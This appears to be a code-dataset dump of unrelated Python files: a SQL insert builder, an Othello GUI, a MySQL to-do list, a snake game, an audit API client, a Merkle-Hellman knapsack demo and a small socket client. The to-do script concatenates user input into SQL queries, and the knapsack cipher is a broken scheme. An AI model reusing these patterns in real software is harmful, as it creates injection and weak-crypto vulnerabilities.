        # so %s is used for every column (a %d placeholder would fail at execute time)
        value_part += "%s,"
    column_part = re.sub(",$", "", column_part)
    value_part = re.sub(",$", "", value_part)
    sql = "INSERT INTO " + table + " (" + column_part + ") VALUES (" + value_part + ")"  # assemble the SQL statement
    # Build the parameter values
val = []
for data in data:
val_item = []
for column in column_list:
if column[0] in data and (column[1] == int or column[1] == float or column[1] == str):
val_item.append(data[column[0]])
else:
if column[1] == int or column[1] == float:
val_item.append(0)
else:
val_item.append("")
val.append(val_item)
return sql, val
def sql_insert_pure(table: str, data: list):
""" [生成SQL语句]INSERT语句(纯粹SQL语句,部分sql和val)
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:return: <str> SQL语句部分
"""
if len(data) == 0:
return None
    # Build the SQL statement
    column_list = []
    column_part = ""  # column-name part of the SQL statement
for column in data[0]:
column_list.append([column, type(data[0][column])])
column_part += "`" + column + "`,"
column_part = re.sub(",$", "", column_part)
    # Build the value list
value_list = []
for data in data:
val_item = "("
for column in column_list:
if column[0] in data and data[column[0]] is not None:
if column[1] == int or column[1] == float or column[1] == bool:
val_item += str(data[column[0]]) + ","
else:
val_item += "'" + str(data[column[0]]).replace("'", "") + "',"
else:
if column[1] == int or column[1] == float:
val_item += "0,"
else:
val_item += "'',"
val_item = re.sub(",$", ")", val_item)
value_list.append(val_item)
return "INSERT INTO " + table + " (" + column_part + ") VALUES " + ",".join(value_list) # 拼接SQL语句
| true |
70650e335045e2d7edc9f20555b82eaee1d37d41
|
Python
|
msabrishami/EE559_discussion1
|
/test1.py
|
UTF-8
| 86 | 2.5625 | 3 |
[] |
no_license
|
# This is our first python code
print "Hellow World!"
print "Its nice to be here"
| true |
ce465f049296bbc7fb0c80bedb5aa39a0ab4bae3
|
Python
|
shimomura314/non-bit-reversi
|
/gui.py
|
UTF-8
| 9,413 | 2.890625 | 3 |
[
"MIT"
] |
permissive
|
"""GUI."""
import copy
import time
import wx
from color import color_pallet as cp
from menu import MenuBar
import othello
class MyFrame(wx.Frame):
"""Make frame for GUI."""
def __init__(self, parent=None, id=-1, title=None, size=(640, 480), othello=None):
wx.Frame.__init__(self, parent, id, title, size=size)
self.othello = othello
self.result = False
# Initialize status bar
self.CreateStatusBar()
self.SetStatusText("status bar")
self.GetStatusBar().SetBackgroundColour(None)
# Initialize menu bar
self.SetMenuBar(MenuBar(self))
# Set panels
self._game_panel = GamePanel(self)
self._user_panel = UserPanel(self)
layout = wx.BoxSizer(wx.HORIZONTAL)
layout.Add(self._game_panel, proportion=3, flag=wx.EXPAND)
layout.Add(self._user_panel, proportion=1, flag=wx.EXPAND)
self.SetSizer(layout)
self._timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_timer)
self._timer.Start(100)
self.user_auto = False
return
def on_timer(self, event):
self.result = self.othello.process_game()
return
class GamePanel(wx.Panel):
def __init__(self, frame):
wx.Panel.__init__(self, frame)
self.SetBackgroundColour("white")
self._frame = frame
self._disks = [[None for _ in range(8)] for _ in range(8)]
self._position = [[(row*30, column*30) for column in range(8)] for row in range(8)]
self._line_position = [[0 for _ in range(9)] for _ in range(2)]
# Set board and disks
for row in range(8):
for column in range(8):
self._disks[row][column] = Disk()
self._square = SquareMap()
self._client_DC = wx.ClientDC(self)
self._timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_timer)
self.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self._timer.Start(100)
return
def on_left_down(self, event):
"""If a disk area was clicked, return the position of disk."""
different = self._line_position[0][1] - self._line_position[0][0]
select_x = (event.X - self._line_position[0][0])//different
select_y = (event.Y - self._line_position[1][0])//different
return self._frame.othello.choice_player(int(select_x+1), int(select_y+1))
def update_data(self):
"""Get the size of panel and calculate the size of board."""
width, height = self.GetSize()
BOARD_SIZE = min(width, height)*0.7
DISK_SIZE = (BOARD_SIZE/7)*0.7/2
self._board = self._frame.othello.display_board()
self._width = width
self._height = height
self._BOARD_SIZE = BOARD_SIZE
self._DISK_SIZE = DISK_SIZE
self._position = [
[(width/2 - BOARD_SIZE/2 + row*BOARD_SIZE/7, height/2 - BOARD_SIZE/2 + column*BOARD_SIZE/7) for column in range(8)] for row in range(8)
]
self._line_position = [
[width/2 + (x-4)*BOARD_SIZE/7 for x in range(9)],
[height/2 + (x-4)*BOARD_SIZE/7 for x in range(9)]
]
def draw_board(self):
"""Determine disks" position and draw area."""
self._bit_map = wx.Bitmap(self._width, self._height)
self._buffer_DC = wx.BufferedDC(self._client_DC, self._bit_map)
self._buffer_DC.Clear()
self._square.draw(self._buffer_DC, self._line_position)
for row in range(8):
for column in range(8):
if self._board[row][column] == 1:
self._disks[row][column].draw(cp.COLOR_BLACK_DISK, self._buffer_DC, self._position[row][column], self._DISK_SIZE)
elif self._board[row][column] == -1:
self._disks[row][column].draw(cp.COLOR_WHITE_DISK, self._buffer_DC, self._position[row][column], self._DISK_SIZE)
else:
self._disks[row][column].draw(cp.COLOR_BOARD, self._buffer_DC, self._position[row][column], self._DISK_SIZE)
self._client_DC.DrawBitmap(self._bit_map, 0, 0)
def on_timer(self, event):
self.update_data()
self.draw_board()
class UserPanel(wx.Panel):
def __init__(self, frame):
super().__init__()
wx.Panel.__init__(self, frame)
self._frame = frame
self._user_point_panel = PointPanel(self, frame, cp.COLOR_PANEL_PLAYER, 1)
self._CPU_point_panel = PointPanel(self, frame, cp.COLOR_PANEL_CPU, -1)
self._result_panel = ResultPanel(self, frame)
layout = wx.BoxSizer(wx.VERTICAL)
layout.Add(self._user_point_panel, proportion=1, flag=wx.EXPAND)
layout.Add(self._CPU_point_panel, proportion=1, flag=wx.EXPAND)
layout.Add(self._result_panel, proportion=1, flag=wx.EXPAND)
self.SetSizer(layout)
self._timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_timer)
self._timer.Start(100)
return
def on_timer(self, event):
"""Determine disks' position and draw area."""
self._user_point_panel.draw(self._frame.othello.count_player)
self._CPU_point_panel.draw(self._frame.othello.count_CPU)
self._result_panel.draw()
class PointPanel(wx.Panel):
def __init__(self, panel, frame, back_color:str, is_player:int):
super().__init__()
wx.Panel.__init__(self, panel)
self.SetBackgroundColour(back_color)
self._is_player = is_player
self._frame = frame
if is_player == 1:
self._text = "You"
else:
self._text = "CPU"
self._client_DC = wx.ClientDC(self)
def draw(self, point:int):
"""Show each player's points."""
width, height = self.GetSize()
size = min(width, height)
if self._is_player * self._frame.othello._player_color == 1:
color = cp.COLOR_BLACK_DISK
else:
color = cp.COLOR_WHITE_DISK
self._bit_map = wx.Bitmap(width, height)
self._buffer_DC = wx.BufferedDC(self._client_DC, self._bit_map)
self._buffer_DC.Clear()
self._buffer_DC.SetPen(wx.Pen(color))
self._buffer_DC.SetBrush(wx.Brush(color))
self._buffer_DC.DrawCircle(width/3, height/2, size*0.2)
self._buffer_DC.SetFont(wx.Font(size*0.175, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self._buffer_DC.DrawText("×" + str(point), width*0.55, height/2)
self._buffer_DC.DrawText(self._text, width*0.55, height*0.3)
self._client_DC.DrawBitmap(self._bit_map, 0, 0)
return
class ResultPanel(wx.Panel):
def __init__(self, panel, frame):
super().__init__()
wx.Panel.__init__(self, panel)
self._frame = frame
self._text = ""
self._client_DC = wx.ClientDC(self)
def draw(self):
width, height = self.GetSize()
size = min(width, height)
if self._frame.result:
self._text = self._frame.othello.result
else:
self._text = ""
self._bit_map = wx.Bitmap(width, height)
self._buffer_DC = wx.BufferedDC(self._client_DC, self._bit_map)
self._buffer_DC.Clear()
self._buffer_DC.SetPen(wx.Pen("black"))
self._buffer_DC.SetBrush(wx.Brush("black"))
self._buffer_DC.SetFont(wx.Font(size*0.175, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self._buffer_DC.DrawText(self._text, width*0.5, height/2)
self._client_DC.DrawBitmap(self._bit_map, 0, 0)
return
class Disk(object):
def __init__(self):
return
def draw(self, color:str, buffer_DC, position:tuple, size:float):
buffer_DC.SetPen(wx.Pen(color))
buffer_DC.SetBrush(wx.Brush(color))
buffer_DC.DrawCircle(position, size)
return
class SquareMap(object):
def __init__(self):
return
def draw(self, buffer_DC, line_position:list):
edge_length = line_position[0][-1] - line_position[0][0]
buffer_DC.SetPen(wx.Pen(cp.COLOR_BOARD_EDGE))
buffer_DC.SetBrush(wx.Brush(cp.COLOR_BOARD_EDGE))
buffer_DC.DrawRectangle(
line_position[0][0] - edge_length*0.05, line_position[1][0] - edge_length*0.05,
edge_length*1.1, edge_length*1.1
)
buffer_DC.SetPen(wx.Pen(cp.COLOR_BOARD))
buffer_DC.SetBrush(wx.Brush(cp.COLOR_BOARD))
buffer_DC.DrawRectangle(
line_position[0][0] - edge_length*0.025, line_position[1][0] - edge_length*0.025,
edge_length*1.05, edge_length*1.05
)
buffer_DC.SetPen(wx.Pen(cp.COLOR_BOARD_LINE))
buffer_DC.SetBrush(wx.Brush(cp.COLOR_BOARD_LINE))
for row in range(9):
for column in range(9):
buffer_DC.DrawLine(
line_position[0][row], line_position[1][0],
line_position[0][row], line_position[1][-1]
)
buffer_DC.DrawLine(
line_position[0][0], line_position[1][column],
line_position[0][-1], line_position[1][column]
)
for row in range(1, 8):
for column in range(1, 8):
buffer_DC.DrawCircle(line_position[0][row], line_position[1][column], edge_length*0.005)
return
| true |
eb99c0b19214c53c472654bf7a9dc618dc4e4b5f
|
Python
|
saurabh-mani/ToDoList
|
/to-do-list-1.0.py
|
UTF-8
| 1,111 | 3.140625 | 3 |
[] |
no_license
|
import mysql.connector
#Connection to MySQL
mydb = mysql.connector.connect(host='localhost',user='username',passwd='password',database='ToDoList')
#cursor
mycursor = mydb.cursor()
print("1. List all records")
print("2. List pending")
print("3. Mark done")
print("4. Add entry")
operation = input("Choose an operation:")
if operation=='1':
qry = "Select * from todolist;"
elif operation=='2':
qry = "Select * from todolist where Flag = 1"
elif operation=='3':
entryid = int(input("Enter Entry Id: "))
qry = ("update todolist set Flag = 0 where EntryId = "+str(entryid)+";")
mycursor.execute(qry)
mydb.commit()
elif operation=='4':
    title = input("Title: ")
    desc = input("Description: ")
    # Build the INSERT statement; column names are assumed from the SELECT output above
    qry = ("insert into todolist (Title, Description, Flag) values ('"+title+"','"+desc+"',1);")
    mycursor.execute(qry)
    mydb.commit()
if(operation=='1' or operation=='2'):
mycursor.execute(qry)
print("--------------------------------------------------------")
print("Entry Id|Title\t\t|Description")
print("--------+---------------+--------------------------------")
for i in mycursor:
print(str(i[0])+"\t|"+i[1]+"\t|"+i[2])
print("--------------------------------------------------------")
| true |
7d46b9f184bf46a9c5abdcbd83ae4fd7772908f8
|
Python
|
virtru/audit-export-client
|
/auditexport/auditclient/auditclient.py
|
UTF-8
| 4,704 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
import random
import hashlib
import base64
import binascii
import requests
import jwt
import time
import sys
import logging
from binascii import Error
from . import errors
logger = logging.getLogger(__name__)
VJWT_TTL_SECONDS = 300.0
API_HOST = 'audit.virtru.com'
API_PATH = '/api/messages'
class AuditClient:
"""Audit Client for fetching audit records."""
def __init__(self, apiTokenSecret, apiTokenId, apiHost=API_HOST, apiPath=API_PATH):
""" AuditClient class constructor
Arguments:
apiTokenSecret {String} -- The apiTokenSecret provided by Virtru.
apiTokenId {String} -- The apiTokenId proviced by Virtru.
apiHost {[String]} -- The apiHost. Defaults to audit.virtru.com.
apiPath {[String]} -- The apiPath. Defaults to /api/messages.
"""
self.apiTokenSecret = apiTokenSecret
self.apiTokenId = apiTokenId
self.apiHost = apiHost
self.apiPath = apiPath
def fetchRecords(self, req):
""" Fetch audit records
Arguments:
req {Dictionary} -- request Dictionary
e.g. {
method: GET,
query: {
start: 2000,
end: 2018
}
}
Returns:
Dictionary -- repsponse object
The response dictionary has the following format:
{
docs: [{Dictonary}],
nextPageStartKey: {String}
}
"""
vjwtString = self._generateVjwtString(req)
headers = {
'Authorization': 'VJWTv1.0.0 ' + vjwtString.decode(),
'Connection': 'close'
}
apiUrl = self.apiHost + self.apiPath
response = requests.get("https://" + apiUrl,
params=req['query'], headers=headers)
self._validateResponse(response.status_code)
return response.json()
def _validateResponse(self, statusCode):
"""Validates response """
def status401():
raise errors.InvalidCredentialsError()
def default():
raise errors.ClientConnectionError(statusCode)
def status200():
pass
def switch(arg):
switcher = {
401: status401,
403: status401,
200: status200
}
switcher.get(arg, default)()
switch(statusCode)
def _generateVjwtString(self, req):
"""Generate vjwt authorization string to be included in authorization of requests
Arguments:
req {Dictonary} -- request dictionary.
Returns:
String -- The authorization string.
"""
try:
tokenSecret = base64.b64decode(self.apiTokenSecret)
except (TypeError, binascii.Error) as err:
raise errors.InvalidCredentialsError(
'The provided ApiSecret/ApiId are invalid')
method = req['method']
queryKeys = req['query'].keys()
queryParams = self._generateQueryParams(req['query'], queryKeys)
nonce = self._generateNonce()
payload = {
'sub': self.apiTokenId,
'iat': int(time.time()),
'jti': nonce,
'rsha': self._generateRsha(method, self.apiHost, self.apiPath, queryParams),
'rqps': ','.join(queryKeys),
'exp': int(time.time()+VJWT_TTL_SECONDS)
}
return jwt.encode(payload, tokenSecret, algorithm='HS256')
def _generateQueryParams(self, query, keys):
"""Generate string of query
Arguments:
query {OrderedDict} -- dictionary containing query params.
e.g. {
start: 2000,
end: 2019
}
key {List} -- List of keys
Returns:
String -- query string. e.g. start=2000end==2019
"""
result = ''
for key in keys:
result = result+'%s=%s' % (key, query[key])
return result
def _generateNonce(self, length=8):
"""Generate nonce"""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def _generateRsha(self, method, host, path, queryParams):
"""Generate Base64UrlEncode of SHA256 hash of the Method + host + path + query params + headers"""
hash = hashlib.sha256(
(method + host + path + queryParams).encode('utf-8')).digest()
b64Hash = base64.urlsafe_b64encode(hash)
# Remove padding
b64Hash = b64Hash.decode().replace('=', '')
return b64Hash
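
# Minimal usage sketch (credential values are placeholders, not real tokens):
#
#   client = AuditClient(apiTokenSecret='<base64 secret>', apiTokenId='<token id>')
#   page = client.fetchRecords({'method': 'GET', 'query': {'start': 0, 'end': 1600000000}})
#   for record in page['docs']:
#       print(record)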
| true |
1bb2542c2251001f68f2670136fb1b90de646585
|
Python
|
jb26444/lazynet
|
/Python/Learning/square_1.py
|
UTF-8
| 645 | 3.875 | 4 |
[] |
no_license
|
import turtle
def draw():
brad = turtle.Turtle()
brad.shape("turtle")
brad.color("blue")
brad.speed(2)
offset = 0
brad1 = 0
while ( brad1 < 25 ):
brad.right(offset)
brad.forward(100)
brad.right(90)
brad.forward(100)
brad.right(90)
brad.forward(100)
brad.right(90)
brad.forward(100)
brad.right(90)
offset = offset + 25
brad1 = brad1 + 1
def draw_square():
window = turtle.Screen()
window.bgcolor("red")
square = 0
while (square < 1):
draw()
square = square + 1
draw_square()
| true |
3cdaed0736b8eb6ad45719659d45a2bbf3dff21f
|
Python
|
artemmarkaryan/price_checker
|
/database/facade/user.py
|
UTF-8
| 210 | 2.53125 | 3 |
[] |
no_license
|
from database.models import User, Platform
def get_or_create(user_id: int, platform: str) -> User:
platform = Platform.get(name=platform)
return User.get_or_create(user_id=user_id, platform=platform)
| true |
a7ab3180d0059ea8f2e4cf069e99146d3d938cfd
|
Python
|
joyzhaoyang/Financial-Computing-III
|
/FC3_HW2_Q1_Merkle-Hellman_Knapsack_Cryptosystem.py
|
UTF-8
| 3,092 | 3.84375 | 4 |
[] |
no_license
|
"""
This file: FC3HW2Prob1.py
Programmer: Joy Zhao (yangzhao@tepper.cmu.edu)
Course/Section: 46-903
Assignment: Homework2, Problem1
Description: Merkle-Hellman Knapsack Cryptosystem
Performing key generation, encryption and decryption and using Python lists.
Methods: http://en.wikipedia.org/wiki/Merkle%E2%80%93Hellman_knapsack_cryptosystem
Last Modified: 04/08/15
Known Bugs: fixed keys as suggested in Discussion Board
"""
"""
Comments:
The best case and worst case computational complexity
of both the encryption and decryption process is O(n),
where n is the size of text.
I write a very simple program here. Encryption is performed
character by character of the string, and the results are stored
in a list of integers, each integer is the code for a character.
Similarly, decryption is also performed character by character.
"""
""" Get input string """
str_input = raw_input('Enter a string and I will encrypt it as single large integer.')
while len(str_input) >= 80: # if string is too long, try again
str_input = raw_input('Enter a string of fewer than 80 characters in length, try again')
""" Initiate keys, source: wikipedia """
w = [2,7,11,21,42,89,180,354] # basis for private key
q = 881 # modulus
r = 588 # multiplier
b = [] # public key
# generate public key
for i in range(len(w)):
b.append(w[i]*r%q) # public key
""" Encryption """
codes = [] # list of intergers, each representing encryption of each character
for c in str_input:
bin_str = format(ord(c), 'b')
if len(bin_str)==7: # eight digits binary code of character
bin_str = "0"+format(ord(c), 'b')
elif len(bin_str)==6:
bin_str = "00"+format(ord(c), 'b')
# print(bin_str)
code = 0
for i in range(len(bin_str)):
code = code + int(bin_str[i])*b[i]
codes.append(code)
""" Print results of Encryption"""
print "Clear text:"
print str_input
print "Number of clear text bytes = ", len(str_input)
print str_input, "is encrypted as "
print ''.join(map(str, codes))
""" Modular inverse """
# source: http://rosettacode.org/wiki/Modular_inverse#Python
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
""" Decryption """
s = modinv(r, q);
str_output = ""
for i in range(len(codes)):
c = codes[i]*s%q
bin_out = ""
for j in range(len(w)):
if c-w[len(w)-j-1]>=0:
c = c-w[len(w)-j-1]
bin_out = "1" + bin_out
else:
bin_out = "0" + bin_out
str_output = str_output+chr(int(bin_out, 2)) # convert to character
""" Print results of Decryption """
print "Result of decryption: ", str_output
""" The fix """
raw_input("Press enter to exit")
| true |
74c5bd78f50d96f1f32a8ebddd3d9cfed64d1788
|
Python
|
vsupe/jobeasy_snake_game
|
/snake.py
|
UTF-8
| 6,202 | 3.15625 | 3 |
[] |
no_license
|
import sys
from time import sleep
import pygame
from random import randrange
# Window
WINDOW_HEIGHT = 480
WINDOW_WIDTH = 640
SNAKE_COLOR = (0, 255, 0)
FOOD_COLOR = (255, 0, 0)
BACKGROUND_COLOR = (0, 0, 0)
FONT_COLOR = (255, 255, 255)
DIFFICULTY = {
'easy': 10,
'medium': 25,
'hard': 40
}
class Game:
def __init__(self):
"""
Init class variables for game
"""
self.game = pygame
self.game.init()
self.game.display.set_caption('Snake')
# FPS (frames per second) controller
self.fps = pygame.time.Clock()
self.snake = Snake()
self.food = Food()
self.score = Score()
self.window = Window(self.game.display.set_mode(size=(WINDOW_WIDTH, WINDOW_HEIGHT)))
def game_over(self):
# 1 Head outside of the screen
if self.snake.snake_head[0] < 0 or self.snake.snake_head[0] > WINDOW_WIDTH - 10:
self.window.draw_game_over(self.game, self.exit_game)
elif self.snake.snake_head[1] < 0 or self.snake.snake_head[1] > WINDOW_HEIGHT - 10:
self.window.draw_game_over(self.game, self.exit_game)
# 2 Snake crushed its body
for block in self.snake.snake_body[1:]:
if block[0] == self.snake.snake_head[0] and block[1] == self.snake.snake_head[1]:
self.window.draw_game_over(self.game, self.exit_game)
def exit_game(self):
self.game.quit()
sys.exit()
def turn(self):
self.snake.snake_move()
if self.snake.snake_head[0] == self.food.food[0] and self.snake.snake_head[1] == self.food.food[1]:
self.snake.snake_grown()
self.food.food_respawn()
self.score.increase_score()
def run(self):
while True:
for event in self.game.event.get():
if event.type == self.game.QUIT:
self.exit_game()
elif event.type == self.game.KEYDOWN:
if event.key == self.game.K_ESCAPE:
self.exit_game()
else:
if event.key == self.game.K_DOWN or event.key == self.game.K_s:
self.snake.snake_change_direction('DOWN')
if event.key == self.game.K_UP or event.key == self.game.K_w:
self.snake.snake_change_direction('UP')
if event.key == self.game.K_LEFT or event.key == self.game.K_a:
self.snake.snake_change_direction('LEFT')
if event.key == self.game.K_RIGHT or event.key == self.game.K_d:
self.snake.snake_change_direction('RIGHT')
self.turn()
self.game_over()
self.window.draw_stage()
self.window.draw_snake(self.game, self.snake.snake_body)
self.window.draw_food(self.game, self.food.food)
self.window.draw_score(self.game, self.score.score)
self.game.display.update()
self.fps.tick(DIFFICULTY['easy'])
class Snake:
def __init__(self):
self.snake_direction = 'RIGHT'
self.snake_head = [100, 50]
self.snake_body = [
self.snake_head,
[self.snake_head[0] - 10, self.snake_head[1]],
[self.snake_head[0] - 20, self.snake_head[1]],
]
def snake_change_direction(self, new_snake_direction: str):
if new_snake_direction == self.snake_direction:
return
if self.snake_direction == 'UP' and new_snake_direction == 'DOWN':
return
if self.snake_direction == 'DOWN' and new_snake_direction == 'UP':
return
if self.snake_direction == 'LEFT' and new_snake_direction == 'RIGHT':
return
if self.snake_direction == 'RIGHT' and new_snake_direction == 'LEFT':
return
self.snake_direction = new_snake_direction
def snake_move(self):
if self.snake_direction == 'UP':
self.snake_head = [self.snake_head[0], self.snake_head[1] - 10]
elif self.snake_direction == 'DOWN':
self.snake_head = [self.snake_head[0], self.snake_head[1] + 10]
elif self.snake_direction == 'RIGHT':
self.snake_head = [self.snake_head[0] + 10, self.snake_head[1]]
elif self.snake_direction == 'LEFT':
self.snake_head = [self.snake_head[0] - 10, self.snake_head[1]]
self.snake_body.insert(0, self.snake_head)
self.snake_body.pop()
def snake_grown(self):
self.snake_body.insert(0, self.snake_head)
self.snake_move()
class Food:
def __init__(self):
self.food = [200, 200]
def food_respawn(self):
self.food = [randrange(1, WINDOW_WIDTH // 10) * 10, randrange(1, WINDOW_HEIGHT // 10) * 10]
class Score:
def __init__(self):
self.score = 0
def increase_score(self):
self.score += 10
class Window:
def __init__(self, window):
self.window = window
def draw_stage(self):
self.window.fill(BACKGROUND_COLOR)
def draw_snake(self, game, snake_body):
for part in snake_body:
game.draw.rect(self.window, SNAKE_COLOR, game.Rect(part[0], part[1], 10, 10))
def draw_food(self, game, food):
game.draw.rect(self.window, FOOD_COLOR, game.Rect(food[0], food[1], 10, 10))
def draw_score(self, game, score):
SCORE_FONT = game.font.SysFont('Times New Roman', 20)
score_surface = SCORE_FONT.render(f'Score: {score}', True, FONT_COLOR)
score_rect = score_surface.get_rect()
score_rect.midtop = (WINDOW_WIDTH // 2, 15)
self.window.blit(score_surface, score_rect)
def draw_game_over(self, game, exit_game):
SCORE_FONT = game.font.SysFont('Times New Roman', 60)
score_surface = SCORE_FONT.render(f'GAME OVER', True, FOOD_COLOR)
score_rect = score_surface.get_rect()
score_rect.midtop = (WINDOW_WIDTH // 2, WINDOW_HEIGHT // 2 - 30)
self.window.fill(BACKGROUND_COLOR)
self.window.blit(score_surface, score_rect)
game.display.update()
sleep(3)
exit_game()
| true |
592a93202545cc27955482b5ec82800ea78012e3
|
Python
|
JiahangGu/leetcode
|
/DFS+BFS/src/20-10-16-207-course-schedule.py
|
UTF-8
| 2,423 | 3.6875 | 4 |
[] |
no_license
|
#!/usr/bin/env python
# encoding: utf-8
# @Time:2020/10/16 11:52
# @Author:JiahangGu
from typing import List
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
"""
        Detect whether the graph contains a cycle, using topological sort. In the BFS approach, each time the
        front element is popped from the queue, the in-degree of every neighbouring node is decreased by 1, and
        nodes whose in-degree drops to 0 are pushed onto the queue. The order in which elements leave the queue
        is a topological order. If fewer than n nodes are processed, a cycle exists (the loop terminates early).
:param numCourses:
:param prerequisites:
:return:
"""
# from collections import defaultdict
# edges = defaultdict(list)
# degree = defaultdict(int)
# for t, f in prerequisites:
# edges[f].append(t)
# degree[t] += 1
# queue = [i for i in range(numCourses) if degree[i] == 0]
# count = 0
# while queue:
# cur = queue.pop(0)
# count += 1
# for x in edges[cur]:
# degree[x] -= 1
# if degree[x] == 0:
# queue.append(x)
# return count == numCourses
"""
        DFS solution. Since DFS keeps walking from a start node until it can go no further, what matters here is the out-degree: when the out-degree is 0 the search stops deepening. To avoid falling into a cycle,
        a state array marks each node's visit status. If a node about to be visited is currently being visited, a cycle exists; if it is unvisited, keep recursing into it; if it is already fully visited, skip it.
"""
def dfs(pos):
nonlocal flag
visit[pos] = 1
for x in edges[pos]:
if visit[x] == 1:
flag = False
return
elif visit[x] == 0:
dfs(x)
if not flag:
return
visit[pos] = 2
flag = True
visit = [0] * numCourses
from collections import defaultdict
edges = defaultdict(list)
degree = defaultdict(int)
for t, f in prerequisites:
edges[f].append(t)
degree[f] += 1
for i in range(numCourses):
if flag and visit[i] == 0:
dfs(i)
return flag
s = Solution()
print(s.canFinish(2, [[1,0],[0,1]]))
| true |
d1f4d55299894d251eb48076873f246c5778fe4b
|
Python
|
jdassonvil/OpenClassRoom
|
/table7_deffonction.py
|
UTF-8
| 132 | 3.21875 | 3 |
[] |
no_license
|
def table(nb):
i=0
while i<10:
print(i+1,"*",nb,"=",(i+1)*nb)
i+=1
print("merci beau gosse !")
table(8)
| true |
fccc8174cd7607146fe3b03e8e02ce07c02f3635
|
Python
|
nodepy/nodepy
|
/src/nodepy/utils/path/urlpath.py
|
UTF-8
| 4,055 | 2.53125 | 3 |
[
"MIT"
] |
permissive
|
# The MIT License (MIT)
#
# Copyright (c) 2017-2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
A #pathlib.Path implementation for URLs.
"""
import io
import os
import pathlib2 as pathlib
import posixpath
import six
try:
from urllib.request import urlopen
from urllib.parse import urlparse, urlunparse
except ImportError:
from urllib2 import urlopen
from urlparse import urlparse, urlunparse
class _UrlFlavour(pathlib._PosixFlavour):
sep = '/'
altsep = ''
has_drv = False
pathmod = posixpath
is_supported = True
def splitroot(self, part, sep=sep):
res = urlparse(part)
return (
res.scheme + '://' if res.scheme else '',
res.netloc + '/' if res.netloc else '',
urlunparse(('', '', res.path, res.params, res.query, res.fragment))
)
class PureUrlPath(pathlib.PurePath):
_flavour = _UrlFlavour()
__slots__ = ()
def absolute(self):
return self
def is_absolute(self):
return True
class UrlPath(pathlib.Path, PureUrlPath):
__slots__ = ()
# Wrapper for the socket._fileobject returned from #urlopen().
# Necessary in Python 2 because socket._fileobject does not support
# readable(), writable() and seekable(), and without this protocol it
# can not be wrapped in #io.BufferedReader or #io.TextIOWrapper.
class _readable(object):
def __init__(self, fp, seekable=False):
self._fp = fp
self._seekable = seekable
self._closed = False
def __getattr__(self, name):
return getattr(self._fp, name)
def readable(self):
return True
def writable(self):
return False
def seekable(self):
return self._seekable
def owner(self):
raise NotImplementedError("Path.owner() is unsupported for URLs")
def group(self):
raise NotImplementedError("Path.group() is unsupported for URLs")
def open(self, flags='r', mode=0o666):
if set(flags).difference('rbt'):
raise IOError('URLs can be opened in read-mode only.')
if six.PY2:
fp = self._readable(urlopen(str(self)).fp)
else:
fp = urlopen(str(self))
if not isinstance(fp, io.BufferedReader):
fp = io.BufferedReader(fp)
if 'b' not in flags:
fp = io.TextIOWrapper(fp)
return fp
def is_dir(self):
return False
def is_file(self):
return True
def exists(self):
return True
def is_symlink(self):
return False
def is_socket(self):
return False
def is_fifo(self):
return False
def is_char_device(self):
return False
def is_block_device(self):
return False
def resolve(self, strict=False):
return self
def iterdir(self):
raise NotImplementedError
def make(s, pure=False):
"""
If *s* is a valid URL with a scheme and netloc, returns an #UrlPath or
#PureUrlPath (depending on *pure*). Otherwise, a #ValueError is raised.
"""
if isinstance(s, six.string_types):
res = urlparse(s)
if res.scheme and res.netloc:
return PureUrlPath(s) if pure else UrlPath(s)
raise ValueError('not a URL: {!r}'.format(s))
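
# Minimal usage sketch (the URL is illustrative; open() performs a real HTTP request):
#
#   path = make('https://example.com/robots.txt')
#   with path.open('r') as fp:
#       print(fp.read())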
| true |
7697c03ccbf86647c1cb6738e0b908a4c27de193
|
Python
|
wcmaclean/home-repo
|
/Python_Ruby/surf_spy_client_server/surf_spy_client.py
|
UTF-8
| 514 | 2.59375 | 3 |
[] |
no_license
|
# surf_spy_client.py
#
# Will MacLean
# CSPP 51060
# Final Project
#
import socket
import sys
# variables, for ease of editing
host = 'localhost'
port = 56767
backlog = 5
size = 16384
# grab hostname from command-line input
if (len(sys.argv) == 2):
host = sys.argv[1]
else:
pass
# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.connect((host, port))
while True:
data = s.recv(size)
print "Surfing: ", data
s.close()
| true |
7cfe75f4eb6c03dbe9bb938954ca3a48601943b6
|
Python
|
muthazhagu/EPA
|
/ViolationRecord.py
|
UTF-8
